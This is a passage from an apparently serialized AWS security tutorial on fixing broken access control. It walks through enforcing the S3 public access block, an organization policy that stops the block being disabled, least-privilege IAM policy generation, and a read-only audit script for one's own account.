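  printf '[{"ReadWriteType":"All","IncludeManagementEvents":true,"DataResources":[{"Type":"AWS::S3::Object","Values":[%s]}]}]\n' "$sel_values"
}

# Example usage (placeholder trail and bucket names):
# aws cloudtrail put-event-selectors \
#   --trail-name "your-trail" \
#   --event-selectors "$(build_s3_data_event_selectors your-bucket-name)"
```

Note that put-event-selectors replaces the trail's existing selectors rather than appending to them, so pass every bucket you want covered in a single call.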

Purple Phase: The Structural Fix

Detection catches broken access control after the fact. The structural fix prevents it from being possible.

Fix 1: Account-Level S3 Public Access Block

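This one account-level configuration (four flags, all set to true) prevents any bucket in the account from becoming public, regardless of bucket policy or ACL. S3 applies the most restrictive combination of the account-level and bucket-level settings, so a permissive bucket-level setting cannot weaken it.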

# Enable account-level S3 public access block
aws s3control put-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) \
  --public-access-block-configuration \
  "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

# Verify
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text)
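The verify step prints the configuration but leaves it to the reader to confirm that all four flags are on. A minimal sketch of an automated check follows. It assumes the AWS CLI is installed and that text output prints booleans as True/False; check_account_pab is a hypothetical helper name.

```shell
# check_account_pab is a hypothetical helper: it returns non-zero unless all
# four account-level Block Public Access flags are enabled.
check_account_pab() {
  pab_flags=$(aws s3control get-public-access-block \
    --account-id "$1" \
    --query 'PublicAccessBlockConfiguration.[BlockPublicAcls,IgnorePublicAcls,BlockPublicPolicy,RestrictPublicBuckets]' \
    --output text 2>/dev/null) || {
    echo "FINDING: account-level public access block not configured (or not readable)"
    return 1
  }
  pab_status=0
  # Text output lists the four booleans in query order, whitespace-separated
  set -- $pab_flags
  for pab_name in BlockPublicAcls IgnorePublicAcls BlockPublicPolicy RestrictPublicBuckets; do
    case "$1" in
      True|true) ;;
      *) echo "FINDING: ${pab_name} is not enabled"; pab_status=1 ;;
    esac
    if [ "$#" -gt 0 ]; then shift; fi
  done
  return "$pab_status"
}

# Example usage:
# check_account_pab "$(aws sts get-caller-identity --query Account --output text)"
```

A partially enabled block (for example, BlockPublicPolicy left false) passes a simple "is it configured" check but fails this one, which is the case the stricter check is meant to catch.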

Fix 2: SCP to Prevent Disabling the Public Access Block

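A Service Control Policy (SCP) at the AWS Organizations level prevents any member account from disabling the public access block, even when the caller is an account administrator. Disabling or deleting the block is authorized by the same IAM actions as setting it, so the SCP denies s3:PutAccountPublicAccessBlock (account level) and s3:PutBucketPublicAccessBlock (bucket level). Because the deny also blocks enabling the setting, apply Fix 1 first or make changes through the exception role.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyS3PublicAccessBlockDisable",
      "Effect": "Deny",
      "Action": [
        "s3:PutAccountPublicAccessBlock",
        "s3:PutBucketPublicAccessBlock"
      ],
      "Resource": "*",
      "Condition": {
        "ArnNotLike": {
          "aws:PrincipalArn": "arn:aws:iam::*:role/s3-public-access-exception-role"
        }
      }
    }
  ]
}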

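# Create the SCP, then attach it to your organizational unit
POLICY_ID=$(aws organizations create-policy \
  --name "DenyS3PublicAccessBlockDisable" \
  --type SERVICE_CONTROL_POLICY \
  --content file://scp-deny-s3-public-access.json \
  --description "Prevents disabling S3 public access block at account level" \
  --query 'Policy.PolicySummary.Id' --output text)

# Replace the target with your OU ID or account ID
aws organizations attach-policy \
  --policy-id "${POLICY_ID}" \
  --target-id "<your-ou-id>"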

Fix 3: IAM Policy Cleanup — Remove Wildcards

For IAM policies with wildcard actions, the fix is least-privilege replacement. This is not a quick operation — it requires analyzing actual usage and scoping to what is actually needed.

# Use IAM Access Analyzer policy generation to generate a least-privilege policy
# based on actual CloudTrail activity for a role
aws accessanalyzer start-policy-generation \
  --policy-generation-details '{
    "principalArn": "arn:aws:iam::123456789012:role/your-role-name"
  }' \
  --cloud-trail-details '{
    "accessRole": "arn:aws:iam::123456789012:role/access-analyzer-cloudtrail-role",
    "trails": [{
      "cloudTrailArn": "arn:aws:cloudtrail:us-east-1:123456789012:trail/your-trail",
      "regions": ["us-east-1", "us-west-2"],
      "allRegions": false
    }],
    "startTime": "2024-01-01T00:00:00Z",
    "endTime": "2024-03-01T00:00:00Z"
  }'

# Retrieve the generated policy
JOB_ID="<returned-job-id>"
aws accessanalyzer get-generated-policy --job-id "${JOB_ID}"
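Policy generation runs asynchronously, so get-generated-policy can report IN_PROGRESS for some time after the job starts. The sketch below polls the job status and prints the generated policy once it succeeds. The helper name, the poll interval, and the retry limit are illustrative assumptions, not AWS defaults.

```shell
# wait_for_generated_policy is a hypothetical helper: poll until the job
# leaves IN_PROGRESS, then print the generated policy document(s).
wait_for_generated_policy() {
  gen_job_id="$1"
  gen_interval="${2:-15}"   # seconds between polls (arbitrary default)
  gen_tries="${3:-40}"      # give up after this many polls (arbitrary default)
  while [ "$gen_tries" -gt 0 ]; do
    gen_status=$(aws accessanalyzer get-generated-policy \
      --job-id "$gen_job_id" \
      --query 'jobDetails.status' --output text) || return 1
    case "$gen_status" in
      SUCCEEDED)
        aws accessanalyzer get-generated-policy --job-id "$gen_job_id" \
          --query 'generatedPolicyResult.generatedPolicies[].policy' --output text
        return 0 ;;
      FAILED|CANCELED)
        echo "policy generation ${gen_status} for job ${gen_job_id}" >&2
        return 1 ;;
    esac
    gen_tries=$((gen_tries - 1))
    sleep "$gen_interval"
  done
  echo "timed out waiting for job ${gen_job_id}" >&2
  return 1
}

# Example usage:
# wait_for_generated_policy "${JOB_ID}" > generated-policy.json
```

Treat the output as a starting draft: review it against what the role is supposed to do before attaching it in place of the wildcard policy.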

For a systematic audit approach, the AWS least privilege audit process in IAM EP09 covers how to move from wildcard policies to scoped permissions methodically across a multi-account environment.

Fix 4: IAM Access Analyzer with Automated Archiving

# Create an archive rule for known-good cross-account access
# (prevents alert fatigue from legitimate cross-account patterns)
aws accessanalyzer create-archive-rule \
  --analyzer-name "account-access-analyzer" \
  --rule-name "archive-legitimate-cross-account" \
  --filter '{
    "principal.AWS": {
      "contains": ["arn:aws:iam::111122223333:role/legitimate-cross-account-role"]
    }
  }'

Run This in Your Own Environment: A01 Audit

Run this in any AWS account you own or are authorized to audit; read-only access is sufficient:

#!/bin/bash
# Purple Team EP04 — Broken Access Control (A01) Audit
# Safe to run with read-only IAM permissions

ACCOUNT=$(aws sts get-caller-identity --query Account --output text)
echo "Auditing account: ${ACCOUNT}"
echo "==============================="

echo ""
echo "[A01-1] S3 Account-Level Public Access Block"
aws s3control get-public-access-block --account-id "${ACCOUNT}" 2>/dev/null || \
  echo "  FINDING: Account-level public access block not configured"

echo ""
echo "[A01-2] S3 Buckets with Public Access"
aws s3api list-buckets --query 'Buckets[].Name' --output text | tr '\t' '\n' | \
  while read bucket; do
    status=$(aws s3api get-bucket-policy-status --bucket "$bucket" 2>/dev/null | \
      jq -r '.PolicyStatus.IsPublic // "false"')
    if [ "$status" = "true" ]; then
      echo "  FINDING: Public bucket: $bucket"
    fi
  done

echo ""
echo "[A01-3] IAM Roles with Wildcard Trust Policies"
aws iam list-roles --query 'Roles[].RoleName' --output text | tr '\t' '\n' | head -50 | \
  while read role; do
    trust=$(aws iam get-role --role-name "$role" \
      --query 'Role.AssumeRolePolicyDocument.Statement' 2>/dev/null)
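    # Match both "Principal": "*" and "Principal": {"AWS": "*"}
    if echo "$trust" | jq -e '.[] | select((.Principal | if type == "object" then .AWS else . end) == "*")' > /dev/null 2>&1; then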
      echo "  FINDING: Wildcard trust principal in role: $role"
    fi
  done

echo ""
echo "[A01-4] IAM Access Analyzer — Active External Access Findings"
ANALYZER=$(aws accessanalyzer list-analyzers --query 'analyzers[0].arn' --output text 2>/dev/null)
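# With --output text, the AWS CLI prints "None" when no analyzer exists
if [ -z "$ANALYZER" ] || [ "$ANALYZER" = "None" ]; then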
  echo "  FINDING: IAM Access Analyzer not enabled"
else
  aws accessanalyzer list-findings \
    --analyzer-arn "${ANALYZER}" \
    --filter '{"status": {"eq": ["ACTIVE"]}}' \
    --query 'findings[].{Resource:resource,Type:resourceType}' \
    --output table
fi

⚠ Common Mistakes When Fixing Broken Access Control in AWS

Fixing the symptom at the bucket level without the account-level block. If you set RestrictPublicBuckets=true on individual buckets but leave the account-level block unset, nothing stops another engineer from creating the next bucket without that setting or switching it off later. The account-level block is the structural control; the bucket-level setting is defense-in-depth.

Not enabling CloudTrail S3 data events. CloudTrail management events capture bucket creation and policy changes. They do not capture GetObject and PutObject by default — that requires enabling S3 data events, which adds cost. Without data events, you cannot see who accessed what in a public bucket. If you can’t afford data events on all buckets, enable them on buckets containing sensitive data.

Treating IAM Access Analyzer findings as one-time. Access Analyzer runs continuously. A new resource policy that grants external access generates a new finding. If you archive findings without fixing the underlying policy, you lose visibility. Archive only findings that represent intentional, documented cross-account access.

Confusing “no GuardDuty findings” with “no problem.” GuardDuty’s Policy:S3/BucketAnonymousAccessGranted only fires when access is newly granted during GuardDuty’s monitoring window. A bucket that was made public before GuardDuty was enabled will not generate a finding — GuardDuty does not retroactively scan all bucket policies. Use AWS Config for retroactive compliance checks; use GuardDuty for real-time detection of new violations.
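For the retroactive side of that split, a minimal sketch of pulling currently non-compliant buckets from AWS Config follows. It assumes the managed rule S3_BUCKET_PUBLIC_READ_PROHIBITED is already deployed; the rule name s3-bucket-public-read-prohibited is an assumption (rule names are chosen at deployment time), and list_noncompliant_buckets is a hypothetical helper.

```shell
# list_noncompliant_buckets is a hypothetical helper: print one FINDING line
# per bucket that AWS Config currently evaluates as NON_COMPLIANT.
list_noncompliant_buckets() {
  # Assumed rule name; pass your own as the first argument if it differs
  cfg_rule="${1:-s3-bucket-public-read-prohibited}"
  aws configservice get-compliance-details-by-config-rule \
    --config-rule-name "$cfg_rule" \
    --compliance-types NON_COMPLIANT \
    --query 'EvaluationResults[].EvaluationResultIdentifier.EvaluationResultQualifier.ResourceId' \
    --output text | tr '\t' '\n' | while read -r cfg_bucket; do
      # Skip blank lines and the "None" placeholder printed for empty results
      if [ -n "$cfg_bucket" ] && [ "$cfg_bucket" != "None" ]; then
        echo "FINDING: non-compliant bucket: $cfg_bucket"
      fi
    done
}

# Example usage:
# list_noncompliant_buckets
```

Unlike the GuardDuty finding, this reports buckets that were already public before monitoring started, as long as Config has evaluated them.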

For the full IAM attack chain that broken access control enables — including IAM privilege escalation paths via iam:PassRole — see IAM series EP08. The privilege escalation analysis belongs alongside the access control audit.

Quick Reference

Control	What It Does	AWS Service
Account-level S3 public access block	Prevents any bucket from becoming public	S3 Control
SCP: deny public access block disable	Prevents disabling the account-level block	Organizations
AWS Config: `S3_BUCKET_PUBLIC_READ_PROHIBITED`	Flags buckets that are or become public	AWS Config
GuardDuty: `Policy:S3/BucketAnonymousAccessGranted`	Detects new public access grants	GuardDuty
IAM Access Analyzer	Finds all resources with external access grants	Access Analyzer
CloudTrail S3 data events	Captures GetObject/PutObject for audit	CloudTrail
IAM policy generation	Generates least-privilege policy from actual usage	Access Analyzer

Key Takeaways

Broken access control in AWS (OWASP A01) is the most common cloud security failure — IAM wildcards, public S3, and broad trust policies are the three primary manifestations
A public S3 bucket with 47 million records was active for six months without a single alert — because the detection controls (AWS Config rules, GuardDuty) weren’t enabled to look for it
The structural fix is the account-level S3 public access block enforced by SCP — detection tools catch violations; the SCP prevents the violation from being possible
IAM Access Analyzer provides continuous visibility into every resource that grants external access — enable it in every account
The red phase can be run with read-only permissions against your own account — the audit script above reveals your current A01 exposure in under five minutes
Fixing A01 without enabling the A09 controls (CloudTrail data events, GuardDuty, AWS Config) leaves you blind to whether the fix is working
Use Access Analyzer’s policy generation feature to move from wildcard policies to least-privilege without guessing

What’s Next

EP05 covers MFA fatigue attacks — how the Uber and Okta breaches worked at the authentication layer, how to simulate push-notification fatigue in a test environment, and the structural fix: phishing-resistant MFA using FIDO2 hardware keys. The identity layer is where most cloud compromises start — understanding how push MFA fails is the prerequisite for knowing why hardware keys are the only structural answer.
